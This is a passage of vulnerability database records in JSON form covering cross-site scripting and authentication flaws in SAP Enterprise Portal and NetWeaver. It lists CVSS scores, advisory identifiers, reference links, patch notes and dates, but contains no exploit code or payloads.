"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2017-10701",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-10701",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-1309",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008516"
},
{
"db": "NVD",
"id": "CVE-2017-10701"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1309"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross site scripting (XSS) vulnerability in SAP Enterprise Portal 7.50 allows remote attackers to inject arbitrary web script or HTML, aka SAP Security Notes 2469860, 2471209, and 2488516. Vendors have confirmed this vulnerability SAP Security Note 2469860 , 2471209 , 2488516 It is released as.Information may be obtained and information may be altered. \nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. A remote user can conduct cross-site scripting attacks. \n\nThe software does not properly filter HTML code from user-supplied input\nbefore displaying the input. As a result, the code will be able to access\nthe target user\u0027s cookies (including authentication cookies), if any,\nassociated with the site, access data recently submitted by the target user\nvia web form to the site, or take actions on the site acting as the target\nuser. \n\n\n*Impact:* A remote user can access the target user\u0027s cookies (including\nauthentication cookies), if any, associated with the site running the SAP\nEnterprise Portal, access data recently submitted by the target user via\nweb form to the site, or take actions on the site acting as the target user. \n\n\n*Link to remedies:*\n\nWeb Dynpro Java - https://launchpad.support.sap.com/#/notes/2469860\nSAPGUI for HTML- https://launchpad.support.sap.com/#/notes/2471209\nWeb Dynpro ABAP -https://launchpad.support.sap.com/#/notes/2488516\n\n*Credits:* Imran Khan @Netizen01k reported this vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-10701"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008516"
},
{
"db": "BID",
"id": "100786"
},
{
"db": "BID",
"id": "100788"
},
{
"db": "BID",
"id": "101068"
},
{
"db": "BID",
"id": "100805"
},
{
"db": "PACKETSTORM",
"id": "144391"
}
],
"trust": 2.79
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-10701",
"trust": 2.8
},
{
"db": "CXSECURITY",
"id": "WLB-2017090219",
"trust": 2.4
},
{
"db": "BID",
"id": "100786",
"trust": 1.9
},
{
"db": "BID",
"id": "100788",
"trust": 1.9
},
{
"db": "BID",
"id": "100805",
"trust": 1.9
},
{
"db": "BID",
"id": "101068",
"trust": 1.3
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008516",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1309",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "144391",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "100786"
},
{
"db": "BID",
"id": "100788"
},
{
"db": "BID",
"id": "101068"
},
{
"db": "BID",
"id": "100805"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008516"
},
{
"db": "PACKETSTORM",
"id": "144391"
},
{
"db": "NVD",
"id": "CVE-2017-10701"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1309"
}
]
},
"id": "VAR-201709-0206",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.24785812333333335
},
"last_update_date": "2023-12-18T14:01:29.681000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "September 2017 (2469860\u30012471209\u30012488516)",
"trust": 0.8,
"url": "https://blogs.sap.com/2017/09/12/sap-security-patch-day-september-2017/"
},
{
"title": "SAP Enterprise Portal Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=75194"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008516"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1309"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008516"
},
{
"db": "NVD",
"id": "CVE-2017-10701"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://cxsecurity.com/issue/wlb-2017090219"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/100786"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/100788"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/100805"
},
{
"trust": 1.2,
"url": "http://www.sap.com"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/101068"
},
{
"trust": 0.9,
"url": "https://blogs.sap.com/2017/09/12/sap-security-patch-day-september-2017/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-10701"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-10701"
},
{
"trust": 0.4,
"url": "https://launchpad.support.sap.com/#/notes/2488516"
},
{
"trust": 0.4,
"url": "https://launchpad.support.sap.com/#/notes/2471209"
},
{
"trust": 0.4,
"url": "https://launchpad.support.sap.com/#/notes/2469860"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/11/14/sap-security-patch-day-november-2017/"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2017/sep/80"
}
],
"sources": [
{
"db": "BID",
"id": "100786"
},
{
"db": "BID",
"id": "100788"
},
{
"db": "BID",
"id": "101068"
},
{
"db": "BID",
"id": "100805"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008516"
},
{
"db": "PACKETSTORM",
"id": "144391"
},
{
"db": "NVD",
"id": "CVE-2017-10701"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1309"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "100786"
},
{
"db": "BID",
"id": "100788"
},
{
"db": "BID",
"id": "101068"
},
{
"db": "BID",
"id": "100805"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008516"
},
{
"db": "PACKETSTORM",
"id": "144391"
},
{
"db": "NVD",
"id": "CVE-2017-10701"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1309"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100786"
},
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100788"
},
{
"date": "2017-09-27T00:00:00",
"db": "BID",
"id": "101068"
},
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100805"
},
{
"date": "2017-10-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008516"
},
{
"date": "2017-09-29T17:54:04",
"db": "PACKETSTORM",
"id": "144391"
},
{
"date": "2017-09-29T01:34:48.437000",
"db": "NVD",
"id": "CVE-2017-10701"
},
{
"date": "2017-09-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-1309"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100786"
},
{
"date": "2017-12-19T22:37:00",
"db": "BID",
"id": "100788"
},
{
"date": "2017-09-27T00:00:00",
"db": "BID",
"id": "101068"
},
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100805"
},
{
"date": "2017-10-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008516"
},
{
"date": "2017-10-06T15:23:45.393000",
"db": "NVD",
"id": "CVE-2017-10701"
},
{
"date": "2017-10-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-1309"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "100786"
},
{
"db": "BID",
"id": "100788"
},
{
"db": "BID",
"id": "101068"
},
{
"db": "BID",
"id": "100805"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Enterprise Portal Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008516"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "100786"
},
{
"db": "BID",
"id": "100788"
},
{
"db": "BID",
"id": "101068"
},
{
"db": "BID",
"id": "100805"
}
],
"trust": 1.2
}
}
var-201706-1166
Vulnerability from variot
SAP NetWeaver is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201706-1166",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "99033"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "99033"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.\nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.",
"sources": [
{
"db": "BID",
"id": "99033"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "99033",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "99033"
}
]
},
"id": "VAR-201706-1166",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:55:48.100000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2405943"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/06/13/sap-security-patch-day-june2017/"
}
],
"sources": [
{
"db": "BID",
"id": "99033"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "99033"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-06-13T00:00:00",
"db": "BID",
"id": "99033"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-06-13T00:00:00",
"db": "BID",
"id": "99033"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "99033"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Composite Application Framework and Business Cross Site Scripting Vulnerability",
"sources": [
{
"db": "BID",
"id": "99033"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "99033"
}
],
"trust": 0.3
}
}
var-201007-0346
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP NetWeaver wsnavigator component has a cross-site scripting attack that allows an attacker to exploit a vulnerability to gain sensitive information or hijack a target user session. SAP Netweaver is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. SAP Netweaver 6.4 through 7.0 is vulnerable; other versions may also be affected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201007-0346",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.1,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "6.4"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "6.4*"
}
],
"sources": [
{
"db": "IVD",
"id": "0e46d7f0-1fb3-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-1420"
},
{
"db": "BID",
"id": "41925"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexandr Polyakov",
"sources": [
{
"db": "BID",
"id": "41925"
}
],
"trust": 0.3
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "0e46d7f0-1fb3-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "0e46d7f0-1fb3-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "0e46d7f0-1fb3-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP NetWeaver wsnavigator component has a cross-site scripting attack that allows an attacker to exploit a vulnerability to gain sensitive information or hijack a target user session. SAP Netweaver is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. \nSAP Netweaver 6.4 through 7.0 is vulnerable; other versions may also be affected",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-1420"
},
{
"db": "BID",
"id": "41925"
},
{
"db": "IVD",
"id": "0e46d7f0-1fb3-11e6-abef-000c29c66e3d"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "41925",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2010-1420",
"trust": 0.8
},
{
"db": "IVD",
"id": "0E46D7F0-1FB3-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "0e46d7f0-1fb3-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-1420"
},
{
"db": "BID",
"id": "41925"
}
]
},
"id": "VAR-201007-0346",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "0e46d7f0-1fb3-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-1420"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "0e46d7f0-1fb3-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-1420"
}
]
},
"last_update_date": "2022-05-17T02:07:26.287000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP Netweaver \u0027wsnavigator\u0027 Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/698"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-1420"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.9,
"url": "http://dsecrg.com/pages/vul/show.php?id=140"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.3,
"url": "/archive/1/512584"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-1420"
},
{
"db": "BID",
"id": "41925"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "0e46d7f0-1fb3-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-1420"
},
{
"db": "BID",
"id": "41925"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-07-25T00:00:00",
"db": "IVD",
"id": "0e46d7f0-1fb3-11e6-abef-000c29c66e3d"
},
{
"date": "2010-07-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1420"
},
{
"date": "2010-07-23T00:00:00",
"db": "BID",
"id": "41925"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-07-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1420"
},
{
"date": "2010-07-23T00:00:00",
"db": "BID",
"id": "41925"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "41925"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver \u0027wsnavigator\u0027 Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "IVD",
"id": "0e46d7f0-1fb3-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-1420"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "41925"
}
],
"trust": 0.3
}
}
var-201106-0305
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is an error in the authentication mechanism in the J2EE engine, and an attacker can bypass the authentication mechanism for a denial of service attack
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201106-0305",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.x"
}
],
"sources": [
{
"db": "IVD",
"id": "bea17582-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2388"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
